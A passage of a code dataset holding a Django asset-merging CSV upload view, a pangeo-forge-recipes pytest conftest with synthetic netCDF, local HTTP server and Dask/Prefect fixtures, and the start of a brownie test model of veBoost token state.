{pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n            if mode == 'update':\n                if new_values == []:\n                    destination_asset.services.clear()\n                else:\n                    validated_values = [ProvidedService.objects.get_or_create(name=value)[0] for value in new_values]\n                    destination_asset.services.set(validated_values)\n\n    source_field_name = 'hard_to_count_population'\n    if source_field_name in row:\n        new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n        list_of_old_values = list_of(destination_asset.hard_to_count_population) if not created_new_asset else []\n        if set(new_values) != set(list_of_old_values):\n            more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n            if mode == 'update':\n                if new_values == []:\n                    destination_asset.hard_to_count_population.clear()\n                else:\n                    validated_values = [TargetPopulation.objects.get_or_create(name=value)[0] for value in new_values]\n                    destination_asset.hard_to_count_population.set(validated_values)\n\n    # Fields that don't need to be updated: primary_key_from_rocket, synthesized_key, data_source_name, data_source_url\n    return destination_asset, location, organization, more_results, False\n\n\ndef handle_uploaded_file(f, mode, using):\n    
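\"\"\"Apply (or merely validate) an uploaded merge-instructions CSV.\n\n    mode is 'validate' (report what would change) or 'update' (apply the changes);\n    using is 'using-raw-assets' (rows keyed by RawAsset) or 'using-assets' (rows\n    keyed by Asset). Returns a list of human-readable result strings.\n    \"\"\"\n    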
import csv\n    more_results = []\n\n    assert using in ['using-raw-assets', 'using-assets']\n\n    if f.size > 25000000:\n        raise ValueError(\"handle_uploaded_file hasn't implemented saving the file for reading/parsing yet.\")\n        #for chunk in f.chunks(): # \"Looping over chunks() instead of using read()\n        #    # ensures that large files don't overwhelm your system's memory.\n        #    destination.write(chunk)\n    else:\n        decoded_file = f.read().decode('utf-8').splitlines()\n\n    # Validate the file\n    if using == 'using-assets':\n        reader = csv.DictReader(decoded_file)\n        for row in reader:\n            if 'asset_id' in row and row['asset_id'] not in ['']:\n                more_results.append(f\"asset_id should be blank but is actually {row['asset_id']}. ASSET UPDATER FAILURE.\")\n                return more_results\n\n            if 'id' in row:\n                # Verify that this matches an Asset in the database.\n                raw_id = row['id']\n                if raw_id not in ['']:\n                    try:\n                        primary_asset_iterator = Asset.objects.filter(id = raw_id)\n                        assert len(primary_asset_iterator) == 1 # To ensure it exists in the database.\n                    except AssertionError:\n                        more_results.append(f\"Failed to find Asset with id == {raw_id}. ASSET UPDATER FAILURE.\")\n                        return more_results\n\n            if 'ids_to_merge' in row:\n                # Verify that these match Assets in the database.\n                ids_to_merge = row['ids_to_merge']\n                if ids_to_merge not in ['']:\n                    try:\n                        asset_ids = [int(i) for i in ids_to_merge.split('+')]\n                        assets_iterator = Asset.objects.filter(id__in = asset_ids)\n                        assert len(assets_iterator) == len(asset_ids) # To ensure they all exist in the database.\n                    except AssertionError:\n                        more_results.append(f\"Failed to find Assets with ids == {asset_ids}. ASSET UPDATER FAILURE.\")\n                        return more_results\n\n            if 'location_id' in row and row['location_id'] not in ['', None]:\n                try:\n                    location = Location.objects.get(pk = row['location_id'])\n                except Location.DoesNotExist:\n                    more_results.append(f\"Failed to find Location with id == {row['location_id']}. ASSET UPDATER FAILURE.\")\n                    return more_results\n\n            if 'organization_id' in row and row['organization_id'] not in ['', None]:\n                try:\n                    organization = Organization.objects.get(pk = row['organization_id'])\n                except Organization.DoesNotExist:\n                    more_results.append(f\"Failed to find Organization with id == {row['organization_id']}. ASSET UPDATER FAILURE.\")\n                    return more_results\n\n    asset_ids_to_sync_to_carto = []\n    reader = csv.DictReader(decoded_file)\n    for row in reader:\n\n        created_new_asset = False\n        # Process the 'id' field\n        raw_id = row['id']\n        if using == 'using-raw-assets':\n            primary_raw_asset_iterator = RawAsset.objects.filter(id = raw_id)\n            assert len(primary_raw_asset_iterator) == 1 # To ensure it exists in the database.\n            primary_raw_asset = primary_raw_asset_iterator[0]\n        elif using == 'using-assets':\n            primary_asset_iterator = Asset.objects.filter(id = raw_id)\n            assert len(primary_asset_iterator) == 1 # To ensure it exists in the database.\n            destination_asset = primary_asset_iterator[0] # Note that here\n            # the primary asset is also the destination asset.\n\n        # Process the 'asset_id' field\n        if using == 'using-raw-assets':\n            asset_id = row['asset_id']\n            if asset_id in ['', None]:\n                created_new_asset = True\n                destination_asset = Asset()\n                more_results.append(f\"A new Asset {'would' if mode == 'validate' else 'will'} be created.\")\n            else:\n                destination_asset_iterator = Asset.objects.filter(id = asset_id)\n                assert len(destination_asset_iterator) == 1 # To ensure there is exactly one in the database.\n                destination_asset = destination_asset_iterator[0]\n\n        
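# 'ids_to_merge' is a '+'-delimited list of integer ids (e.g. \"12+345\" would\n        # merge two hypothetical records) naming the records to combine.\n        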
# Process the 'ids_to_merge' field\n        ids_to_merge = row['ids_to_merge']\n        if using == 'using-raw-assets':\n            if ids_to_merge == '':\n                continue # Skip rows with no ids to merge.\n            raw_ids = [int(i) for i in ids_to_merge.split('+')]\n            raw_assets_iterator = RawAsset.objects.filter(id__in = raw_ids)\n            assert len(raw_assets_iterator) == len(raw_ids) # To ensure they all exist in the database.\n            raw_assets = list(raw_assets_iterator)\n            for raw_asset in raw_assets:\n                raw_asset.asset = destination_asset\n\n            if len(raw_assets) == 1:\n                if created_new_asset:\n                    summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Creating a new Asset, \"\n                else:\n                    summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Editing the Asset with id = {asset_id}, previously named {destination_asset.name}, \"\n                summary += f\"and linking it to RawAsset with id = {raw_assets[0].id} and name = {raw_assets[0].name}.\"\n            else:\n                summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Merging RawAssets with ids = {', '.join([str(r.id) for r in raw_assets])} and names = {', '.join([r.name for r in raw_assets])} \"\n                if created_new_asset:\n                    summary += f\" to a new Asset with name {row.get('name', '(No name given)')}.\"\n                else:\n                    summary += f\" to Asset with id = {asset_id}, previously named {destination_asset.name}.\"\n            more_results.append(summary)\n\n        elif using == 'using-assets':\n            # When merging Assets, the Asset that is not the destination\n            # asset should be delisted.\n            if mode == 'update':\n                if ids_to_merge == '':\n                    destination_asset.do_not_display = True\n                    destination_asset._change_reason = f'Asset Updater: Delisting Asset'\n                    destination_asset.save(override_carto_sync = True)\n                    asset_ids_to_sync_to_carto.append(destination_asset.id)\n                    s = f\"Delisting {destination_asset.name}.\"\n                    more_results.append(s)\n                    continue # Skip rows with no ids to merge.\n                asset_ids = [int(i) for i in ids_to_merge.split('+')]\n                assert destination_asset.id in asset_ids\n\n                assets_iterator = Asset.objects.filter(id__in = asset_ids)\n                assert len(assets_iterator) == len(asset_ids) # To ensure they all exist in the database.\n                s = f\"{'Validating this process: ' if mode == 'validate' else ''}Editing the Asset with id = {destination_asset.id}, previously named {destination_asset.name}.\"\n                more_results.append(s)\n                if len(assets_iterator) > 1:\n                    s = f\"Delisting extra Assets (from the list {ids_to_merge}) and assigning corresponding RawAssets to the destination Asset.\"\n                    more_results.append(s)\n\n                for asset in assets_iterator:\n                    if destination_asset.id is not None and asset.id != destination_asset.id:\n                        asset.do_not_display = True # These Assets could be deleted (rather than delisted)\n                        # AFTER reassigning their RawAssets.\n                        asset._change_reason = f'Asset Updater: Delisting Asset'\n                        asset.save()\n                        asset_ids_to_sync_to_carto.append(asset.id)\n\n                        # Iterate over raw assets of this asset and point them to destination_asset.\n                        for raw_asset in asset.rawasset_set.all():\n                            raw_asset.asset = destination_asset\n                            raw_asset._change_reason = f'Asset Updater: Linking RawAsset to different Asset because of Asset merge'\n                            raw_asset.save() # This saving couldn't be done below\n                            # because there can be multiple sets of RawAssets. They'd\n                            # all have to be collected into raw_assets to do it below.\n            else:\n                if '+' in ids_to_merge:\n                    s = f\"Extra Assets (from the list {ids_to_merge}) would be delisted and corresponding RawAssets would be assigned to the destination Asset.\"\n                    more_results.append(s)\n                elif ids_to_merge == '':\n                    s = f\"{destination_asset.name} would be delisted.\"\n                    more_results.append(s)\n\n        ### At this point the fields that differentiate Asset-based Asset updates from\n        ### RawAsset-based Asset updates have been processed.\n        ### What comes out of this stage is destination_asset and raw_assets.\n        destination_asset, location, organization, more_results, error = modify_destination_asset(mode, row, destination_asset, created_new_asset, more_results)\n        if error:\n            return more_results\n\n        if mode == 'update':\n            more_results.append(f\"Updating associated Asset, RawAsset, Location, and Organization instances. 
(This may leave some orphaned.)\\n\")\n more_results.append(f' Updated Asset\\n')\n change_reason = f'Asset Updater: {\"Creating new \" if created_new_asset else \"Updating \"}Asset'\n destination_asset._change_reason = change_reason\n destination_asset.save(override_carto_sync = True) # Is this save actually necessary, given that there's another below?\n\n if using == 'using-raw-assets':\n for raw_asset in raw_assets: # RawAssets must be saved first because an Asset needs at least one\n # linked RawAsset or else it will automatically have do_not_display set to True.\n raw_asset._change_reason = f'Asset Updater: Linking to {\"new \" if created_new_asset else \"\"}Asset'\n raw_asset.save()\n\n if organization is not None:\n organization._change_reason = change_reason\n organization.save()\n if location is not None:\n location._change_reason = change_reason\n location.save()\n more_results.append(f' Linked Location\\n
')\n destination_asset.location = location\n destination_asset.organization = organization\n destination_asset._change_reason = change_reason\n destination_asset.save(override_carto_sync = True)\n asset_ids_to_sync_to_carto.append(destination_asset.id)\n else:\n more_results.append(f\"\\n
\")\n\n    if mode == 'update' and len(asset_ids_to_sync_to_carto) > 0:\n        sync_assets_to_carto_eventually(asset_ids_to_sync_to_carto)\n        more_results.append(f\"\\nasset_ids_to_sync_to_carto = {asset_ids_to_sync_to_carto}\")\n    return more_results\n\n@staff_member_required\ndef upload_file(request, using):\n    # The \"using\" parameter should have either the value \"using-raw-assets\" or\n    # the value \"using-assets\".\n    if request.method == 'POST':\n        form = UploadFileForm(request.POST, request.FILES)\n        if form.is_valid():\n            if 'validate' in request.POST: # The user hit the \"Validate\" button:\n                mode = \"validate\"\n            else:\n                mode = \"update\"\n            results = handle_uploaded_file(request.FILES['file'], mode, using)\n            return render(request, 'update.html', {'form': form, 'results': results, 'asset_based': using == 'using-assets'})\n    else:\n        form = UploadFileForm()\n    return render(request, 'update.html', {'form': form, 'results': [], 'asset_based': using == 'using-assets'})\n\ndef dump_assets(filepath):\n    from django.core.management import call_command\n    call_command('dump_assets_all_fields', filepath)\n\n@staff_member_required\ndef request_asset_dump(request):\n    filepath = '/home/david/downloads/asset_dump.csv'\n    if os.path.exists(filepath): # Clear the file if it exists.\n        os.remove(filepath)\n\n    # This SHOULD run the process as a separate thread, allowing it to\n    # complete after the page is rendered.\n    # t = threading.Thread(target=dump_assets, args=[filepath], daemon=True)\n    # t.start()\n    # but it doesn't. Only 30 lines are written (though the web page does render).\n    dump_assets(filepath) # This works but results in a broken web page.\n    record_count = Asset.objects.count() # Avoids fetching every row just to count them.\n    minutes = record_count/32731*7 + 1\n    estimated_completion_time_utc = datetime.now(pytz.utc) + timedelta(minutes=minutes) # Timezone-aware, so the conversion below is correct.\n    eta_local = estimated_completion_time_utc.astimezone(pytz.timezone('America/New_York')).time().strftime(\"%H:%M\")\n    return render(request, 'dump.html', {'url': 'https://assets.wprdc.org/asset_dump.csv', 'eta': eta_local})\n\nclass AssetViewSet(viewsets.ModelViewSet):\n    renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n    queryset = Asset.objects.all()\n    pagination_class = LimitOffsetPagination\n    filter_backends = [filters.SearchFilter]\n    search_fields = ['name',]\n\n    def get_serializer_class(self, *args, **kwargs):\n        fmt = self.request.GET.get('fmt', None)\n        if fmt in ('geojson', 'geo'):\n            return AssetGeoJsonSerializer\n        if self.action == 'list':\n            return AssetListSerializer\n        return AssetSerializer\n\n\nclass AssetTypeViewSet(viewsets.ModelViewSet):\n    renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n    queryset = AssetType.objects.all()\n    serializer_class = AssetTypeSerializer\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n    renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n    queryset = Category.objects.all()\n    serializer_class = CategorySerializer\n\n\nclass LocationViewSet(viewsets.ModelViewSet):\n    # Note that this view is designed for easy access to the full model from a Python\n    # script, so it uses a full-model serializer and the Django REST Framework's\n    # default snake-case JSON renderer.\n    renderer_classes = (JSONRenderer, CSVRenderer)\n    queryset = Location.objects.all()\n    serializer_class = FullLocationSerializer\n","sub_path":"assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":36797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"465702747","text":"import logging\nimport os\nimport socket\nimport subprocess\nimport time\n\nimport fsspec\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport xarray as xr\nfrom dask.distributed import Client, LocalCluster\nfrom prefect.executors import DaskExecutor\n\nfrom pangeo_forge_recipes import recipes\nfrom pangeo_forge_recipes.executors import (\n    DaskPipelineExecutor,\n    PrefectPipelineExecutor,\n    PythonPipelineExecutor,\n)\nfrom pangeo_forge_recipes.patterns import (\n    ConcatDim,\n    FilePattern,\n    MergeDim,\n    pattern_from_file_sequence,\n)\nfrom pangeo_forge_recipes.storage import CacheFSSpecTarget, FSSpecTarget, MetadataTarget\n\n\n# to use this feature, e.g.\n# $ pytest --redirect-dask-worker-logs-to-stdout=DEBUG\ndef pytest_addoption(parser):\n    parser.addoption(\n        \"--redirect-dask-worker-logs-to-stdout\", action=\"store\", default=\"NOTSET\",\n    )\n\n\ndef get_open_port():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.bind((\"\", 0))\n    s.listen(1)\n    port = str(s.getsockname()[1])\n    s.close()\n    return port\n\n\n@pytest.fixture(scope=\"session\")\ndef daily_xarray_dataset():\n    \"\"\"Return a synthetic random xarray dataset.\"\"\"\n    np.random.seed(1)\n    # TODO: change nt to 11 in order to catch the edge case where\n    # items_per_input does not evenly divide the length of the sequence dimension\n    nt, ny, nx = 10, 18, 36\n    time = pd.date_range(start=\"2010-01-01\", periods=nt, freq=\"D\")\n    lon = (np.arange(nx) + 0.5) * 360 / nx\n    lon_attrs = {\"units\": \"degrees_east\", \"long_name\": \"longitude\"}\n    lat = (np.arange(ny) + 0.5) * 180 / ny\n    lat_attrs = {\"units\": \"degrees_north\", \"long_name\": \"latitude\"}\n    foo = np.random.rand(nt, ny, nx)\n    foo_attrs = {\"long_name\": \"Fantastic Foo\"}\n    # make sure things work with heterogeneous data types\n    bar = np.random.randint(0, 10, size=(nt, ny, nx))\n    bar_attrs = {\"long_name\": \"Beautiful Bar\"}\n    dims = (\"time\", \"lat\", \"lon\")\n    ds = xr.Dataset(\n        {\"bar\": (dims, bar, bar_attrs), \"foo\": (dims, foo, foo_attrs)},\n        coords={\n            \"time\": (\"time\", time),\n            \"lat\": (\"lat\", lat, lat_attrs),\n            \"lon\": (\"lon\", lon, lon_attrs),\n        },\n        attrs={\"conventions\": \"CF 1.6\"},\n    )\n    return ds\n\n\ndef _split_up_files_by_day(ds, day_param):\n    gb = ds.resample(time=day_param)\n    _, datasets = zip(*gb)\n    fnames = [f\"{n:03d}.nc\" for n in range(len(datasets))]\n    return datasets, fnames\n\n\ndef _split_up_files_by_variable_and_day(ds, day_param):\n    all_dsets = []\n    all_fnames = []\n    fnames_by_variable = {}\n    for varname in ds.data_vars:\n        var_dsets, fnames = _split_up_files_by_day(ds[[varname]], day_param)\n        fnames = [f\"{varname}_{fname}\" for fname in fnames]\n        all_dsets += var_dsets\n        all_fnames += fnames\n        fnames_by_variable[varname] = fnames\n    return all_dsets, all_fnames, fnames_by_variable\n\n\n@pytest.fixture(scope=\"session\", params=[\"D\", \"2D\"])\ndef netcdf_local_paths(daily_xarray_dataset, tmpdir_factory, request):\n    \"\"\"Return a list of paths pointing to netcdf files.\"\"\"\n    tmp_path = tmpdir_factory.mktemp(\"netcdf_data\")\n    # copy needed to avoid polluting metadata across multiple tests\n    datasets, fnames = _split_up_files_by_day(daily_xarray_dataset.copy(), request.param)\n    full_paths = [tmp_path.join(fname) for fname in fnames]\n    xr.save_mfdataset(datasets, [str(path) for path in full_paths])\n    items_per_file = {\"D\": 1, \"2D\": 2}[request.param]\n    return full_paths, items_per_file\n\n\n# TODO: this is quite repetitive of the fixture above. 
Replace with parametrization.\n@pytest.fixture(scope=\"session\", params=[\"D\", \"2D\"])\ndef netcdf_local_paths_by_variable(daily_xarray_dataset, tmpdir_factory, request):\n    \"\"\"Return a list of paths pointing to netcdf files.\"\"\"\n    tmp_path = tmpdir_factory.mktemp(\"netcdf_data\")\n    datasets, fnames, fnames_by_variable = _split_up_files_by_variable_and_day(\n        daily_xarray_dataset.copy(), request.param\n    )\n    full_paths = [tmp_path.join(fname) for fname in fnames]\n    xr.save_mfdataset(datasets, [str(path) for path in full_paths])\n    items_per_file = {\"D\": 1, \"2D\": 2}[request.param]\n    path_format = str(tmp_path) + \"/{variable}_{time:03d}.nc\"\n    return full_paths, items_per_file, fnames_by_variable, path_format\n\n\n# TODO: refactor to allow netcdf_local_paths_by_variable to be passed without\n# duplicating the whole test.\n@pytest.fixture(scope=\"session\")\ndef netcdf_http_paths(netcdf_local_paths, request):\n    paths, items_per_file = netcdf_local_paths\n\n    username = \"\"\n    password = \"\"\n\n    first_path = paths[0]\n    # assume that all files are in the same directory\n    basedir = first_path.dirpath()\n    fnames = [path.basename for path in paths]\n\n    this_dir = os.path.dirname(os.path.abspath(__file__))\n    port = get_open_port()\n    command_list = [\n        \"python\",\n        os.path.join(this_dir, \"http_auth_server.py\"),\n        port,\n        \"127.0.0.1\",\n    ]\n    if username:\n        # Credentials are passed to the server only when a username is configured.\n        command_list += [username, password]\n    p = subprocess.Popen(command_list, cwd=basedir)\n    url = f\"http://127.0.0.1:{port}\"\n    time.sleep(2) # let the server start up\n\n    def teardown():\n        p.kill()\n\n    request.addfinalizer(teardown)\n\n    all_urls = [\"/\".join([url, str(fname)]) for fname in fnames]\n    return all_urls, items_per_file\n\n\n@pytest.fixture()\ndef tmp_target(tmpdir_factory):\n    fs = fsspec.get_filesystem_class(\"file\")()\n    path = str(tmpdir_factory.mktemp(\"target\"))\n    return FSSpecTarget(fs, path)\n\n\n@pytest.fixture()\ndef tmp_cache(tmpdir_factory):\n    path = str(tmpdir_factory.mktemp(\"cache\"))\n    fs = fsspec.get_filesystem_class(\"file\")()\n    cache = CacheFSSpecTarget(fs, path)\n    return cache\n\n\n@pytest.fixture()\ndef tmp_metadata_target(tmpdir_factory):\n    path = str(tmpdir_factory.mktemp(\"cache\"))\n    fs = fsspec.get_filesystem_class(\"file\")()\n    cache = MetadataTarget(fs, path)\n    return cache\n\n\n@pytest.fixture\ndef netCDFtoZarr_sequential_recipe(\n    daily_xarray_dataset, netcdf_local_paths, tmp_target, tmp_cache, tmp_metadata_target\n):\n    paths, items_per_file = netcdf_local_paths\n    file_pattern = pattern_from_file_sequence([str(path) for path in paths], \"time\", items_per_file)\n    kwargs = dict(\n        inputs_per_chunk=1,\n        target=tmp_target,\n        input_cache=tmp_cache,\n        metadata_cache=tmp_metadata_target,\n    )\n    return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture\ndef netCDFtoZarr_sequential_subset_recipe(\n    daily_xarray_dataset, netcdf_local_paths, tmp_target, tmp_cache, tmp_metadata_target\n):\n    paths, items_per_file = netcdf_local_paths\n    if items_per_file != 2:\n        pytest.skip(\"This recipe only makes sense with items_per_file == 2.\")\n    file_pattern = pattern_from_file_sequence([str(path) for path in paths], \"time\", items_per_file)\n    kwargs = dict(\n        subset_inputs={\"time\": 2},\n        inputs_per_chunk=1,\n        target=tmp_target,\n        input_cache=tmp_cache,\n        metadata_cache=tmp_metadata_target,\n    )\n    return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture\ndef 
netCDFtoZarr_sequential_multi_variable_recipe(\n daily_xarray_dataset, netcdf_local_paths_by_variable, tmp_target, tmp_cache, tmp_metadata_target\n):\n paths, items_per_file, fnames_by_variable, path_format = netcdf_local_paths_by_variable\n time_index = list(range(len(paths) // 2))\n\n def format_function(variable, time):\n return path_format.format(variable=variable, time=time)\n\n file_pattern = FilePattern(\n format_function,\n ConcatDim(\"time\", time_index, items_per_file),\n MergeDim(\"variable\", [\"foo\", \"bar\"]),\n )\n kwargs = dict(\n inputs_per_chunk=1,\n target=tmp_target,\n input_cache=tmp_cache,\n metadata_cache=tmp_metadata_target,\n )\n return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture(scope=\"session\")\ndef dask_cluster(request):\n cluster = LocalCluster(n_workers=2, threads_per_worker=1, silence_logs=False)\n\n client = Client(cluster)\n\n # cluster setup\n\n def set_blosc_threads():\n from numcodecs import blosc\n\n blosc.use_threads = False\n\n log_level_name = request.config.getoption(\"--redirect-dask-worker-logs-to-stdout\")\n level = logging.getLevelName(log_level_name)\n\n def redirect_logs():\n import logging\n\n for log in [\"pangeo_forge_recipes\", \"fsspec\"]:\n logger = logging.getLogger(log)\n formatter = logging.Formatter(\"%(name)s - %(levelname)s - %(message)s\")\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n handler.setLevel(level)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n client.run(set_blosc_threads)\n client.run(redirect_logs)\n client.close()\n del client\n\n yield cluster\n\n cluster.close()\n\n\n_executors = {\n \"python\": PythonPipelineExecutor,\n \"dask\": DaskPipelineExecutor,\n \"prefect\": PrefectPipelineExecutor,\n \"prefect-dask\": PrefectPipelineExecutor,\n}\n\n\n@pytest.fixture(params=[\"manual\", \"python\", \"dask\", \"prefect\", \"prefect-dask\"])\ndef execute_recipe(request, dask_cluster):\n if request.param == \"manual\":\n\n def execute(r):\n if r.cache_inputs:\n for input_key in r.iter_inputs():\n r.cache_input(input_key)\n r.prepare_target()\n for chunk_key in r.iter_chunks():\n r.store_chunk(chunk_key)\n r.finalize_target()\n\n elif request.param == \"python\":\n\n def execute(recipe):\n return recipe.to_function()()\n\n elif request.param == \"dask\":\n\n def execute(recipe):\n with Client(dask_cluster):\n return recipe.to_dask().compute()\n\n elif request.param == \"prefect\":\n\n def execute(recipe):\n state = recipe.to_prefect().run()\n if state.is_failed():\n raise ValueError(f\"Prefect flow run failed with message {state.message}\")\n\n else:\n assert request.param == \"prefect-dask\"\n\n def execute(recipe):\n flow = recipe.to_prefect()\n executor = DaskExecutor(address=dask_cluster.scheduler_address)\n state = flow.run(executor=executor)\n if state.is_failed():\n raise ValueError(f\"Prefect flow run failed with message {state.message}\")\n\n execute.param = request.param\n return execute\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":10570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"443785293","text":"import math\nfrom collections import defaultdict\nfrom typing import DefaultDict\n\nimport brownie\nfrom brownie import ZERO_ADDRESS, chain, convert\nfrom brownie.network.account import Account, Accounts\nfrom brownie.network.contract import Contract\nfrom brownie.test import strategy\nfrom dataclassy import dataclass\n\nDAY = 86400\nWEEK = DAY * 7\nYEAR = DAY * 365\n\n\n@dataclass(slots=True, iter=True)\nclass Point:\n    \"\"\"Representation of a point on a 2-D plane.\n\n    Examples:\n\n    >>> Point(0, 0)\n    Point(x=0, y=0)\n    >>> Point(0, 0) + Point(0, 1)\n    Point(x=0, y=1)\n    >>> Point(0, 1) - Point(0, 1)\n    Point(x=0, y=0)\n    >>> Point(1, 2) * 3\n    Point(x=3, y=6)\n    \"\"\"\n\n    x: int\n    y: int\n\n    def __add__(self, other: \"Point\") -> \"Point\":\n        return Point(self.x + other.x, self.y + other.y)\n\n    def __sub__(self, other: \"Point\") -> \"Point\":\n        return Point(self.x - other.x, self.y - other.y)\n\n    def __mul__(self, other: int) -> \"Point\":\n        assert isinstance(other, int)\n        return Point(self.x * other, self.y * other)\n\n\n@dataclass(slots=True, iter=True)\nclass Line:\n    \"\"\"Representation of a line on a 2-D plane.\n\n    Examples:\n\n    >>> Line(0, 0)\n    Line(slope=0, bias=0)\n    >>> Line(0, 1) + Line(1, 1)\n    Line(slope=1, bias=2)\n    >>> Line(1, 1) - Line(1, 0)\n    Line(slope=0, bias=1)\n    >>> Line(1, 1) * 3\n    Line(slope=3, bias=3)\n    >>> list(Line(0, 1))\n    [0, 1]\n    >>> Line.from_two_points((0, 0), (1, 1))\n    Line(slope=1, bias=0)\n    \"\"\"\n\n    slope: int = 0\n    bias: int = 0\n\n    @classmethod\n    def from_two_points(cls, a: Point, b: Point) -> \"Line\":\n        \"\"\"Generate a line which fits through two points.\n\n        Uses integer division for calculating slope, similar to the EVM\n        implementation of veBoost.\n        \"\"\"\n        (x1, y1), (x2, y2) = a, b\n        slope = (y2 - y1) // (x2 - x1)\n        bias = y1 - slope * x1\n        return cls(slope, bias)\n\n    def __add__(self, other: \"Line\") -> \"Line\":\n        return Line(self.slope + other.slope, self.bias + other.bias)\n\n    def __sub__(self, other: \"Line\") -> \"Line\":\n        return Line(self.slope - other.slope, self.bias - other.bias)\n\n    def __mul__(self, other: int) -> \"Line\":\n        assert isinstance(other, int)\n        return Line(self.slope * other, self.bias * other)\n\n    def __call__(self, x: int) -> int:\n        return self.slope * x + self.bias\n\n\nclass Token(Line):\n    \"\"\"Representation of a Token's data fields.\n\n    Examples:\n\n    >>> Token()\n    Token(slope=0, bias=0, delegator=None, owner=None, cancel_time=0)\n    >>> Token(1, 1)\n    Token(slope=1, bias=1, delegator=None, owner=None, cancel_time=0)\n    >>> Token(1, 1) + Token(10, 0)\n    Token(slope=11, bias=1, delegator=None, owner=None, cancel_time=0)\n    >>> Token(1, 1) - Token(1, 0)\n    Token(slope=0, bias=1, delegator=None, owner=None, cancel_time=0)\n    >>> Token(1, 1, 'someone', 'someone_else', 30) * 0\n    Token(slope=0, bias=0, delegator='someone', owner='someone_else', cancel_time=30)\n    >>> list(Token(0, 1))\n    [0, 1, None, None, 0]\n    >>> Token.from_two_points((0, 0), (1, 1))\n    Token(slope=1, bias=0, delegator=None, owner=None, cancel_time=0)\n    \"\"\"\n\n    delegator: Account = None\n    owner: Account = None\n    cancel_time: int = 0\n\n    @classmethod\n    def from_two_points(cls, a: Point, b: Point) -> \"Line\":\n        return cls(*super().from_two_points(a, b))\n\n    @property\n    def expire_time(self):\n        if self.slope == 0:\n            return 0\n        else:\n            return -self.bias // self.slope\n\n    def __add__(self, other: \"Token\") -> \"Token\":\n        return Token(*super().__add__(other), *(list(self)[2:]))\n\n    def __sub__(self, other: \"Token\") -> \"Token\":\n        
return Token(*super().__sub__(other), *(list(self)[2:]))\n\n def __mul__(self, other: int) -> \"Token\":\n assert isinstance(other, int)\n return Token(*super().__mul__(other), *(list(self)[2:]))\n\n def __call__(self, x: int) -> int:\n return super().__call__(x)\n\n\n@dataclass(slots=True, iter=True)\nclass Boost:\n\n delegated: Line = Line(0, 0)\n received: Line = Line(0, 0)\n\n\nclass ContractState:\n def __init__(self) -> None:\n\n self.boost: DefaultDict[Account, Boost] = defaultdict(Boost)\n self.boost_tokens: DefaultDict[int, Token] = defaultdict(Token)\n\n def create_boost(\n self,\n delegator: Account,\n receiver: Account,\n percentage: int,\n cancel_time: int,\n expire_time: int,\n _id: int,\n timestamp: int,\n vecrv_balance: int,\n lock_expiry: int,\n update_state: bool = False,\n ):\n assert 0 < percentage < 10_000 # percentage within bounds\n # cancel time before expire time, expire time before lock expiry\n assert cancel_time <= expire_time <= lock_expiry\n assert expire_time >= timestamp + WEEK # expire time greater than min delegation time\n assert _id < 2 ** 96 # id with bounds\n\n assert all(\n [t(timestamp) >= 0 for t in self.boost_tokens.values() if t.delegator == delegator]\n )\n\n delegated_boost: int = self.boost[delegator].delegated(timestamp)\n y = percentage * (vecrv_balance - delegated_boost) // 10_000\n assert y > 0\n\n token: Token = Token.from_two_points((timestamp, y), (expire_time, 0))\n assert token.slope < 0\n\n token.delegator = delegator\n token.owner = receiver\n token.cancel_time = cancel_time\n\n token_id: int = self.get_token_id(delegator.address, _id)\n assert self.boost_tokens[token_id].owner is None\n\n # modify state last\n if update_state:\n self.boost_tokens[token_id] = token\n self.boost[delegator].delegated += token\n self.boost[receiver].received += token\n\n def extend_boost(\n self,\n token_id: int,\n percentage: int,\n expire_time: int,\n cancel_time: int,\n timestamp: int,\n vecrv_balance: int,\n lock_expiry: int,\n update_state: bool = False,\n ):\n assert 0 < percentage <= 10_000\n assert cancel_time <= expire_time <= lock_expiry\n assert expire_time >= timestamp + WEEK\n\n token: Token = self.boost_tokens[token_id]\n assert token.owner is not None\n\n token_current_value: int = token(timestamp)\n token_expiry: int = token.expire_time\n\n assert expire_time >= token_expiry\n if cancel_time < token.cancel_time:\n assert timestamp >= token_expiry\n\n assert all(\n [\n t(timestamp) >= 0\n for t in self.boost_tokens.values()\n if t.delegator == token.delegator and t != token\n ]\n )\n\n delegated_boost: int = (self.boost[token.delegator].delegated - token)(timestamp)\n y: int = percentage * (vecrv_balance - delegated_boost) // 10_000\n assert y > 0\n assert y >= token_current_value\n\n new_token: Token = Token.from_two_points((timestamp, y), (expire_time, 0))\n assert new_token.slope < 0\n\n new_token.delegator = token.delegator\n new_token.owner = token.owner\n new_token.cancel_time = cancel_time\n\n # modify state last\n if update_state:\n self.boost_tokens[token_id] = new_token\n self.boost[token.delegator].delegated -= token\n self.boost[token.delegator].delegated += new_token\n self.boost[token.owner].received -= token\n self.boost[token.owner].received += new_token\n\n def cancel_boost(\n self, token_id: int, caller: Account, timestamp: int, update_state: bool = False\n ):\n token: Token = self.boost_tokens[token_id]\n assert token.owner is not None\n if not (caller == token.owner or token(timestamp) <= 0):\n if caller == 
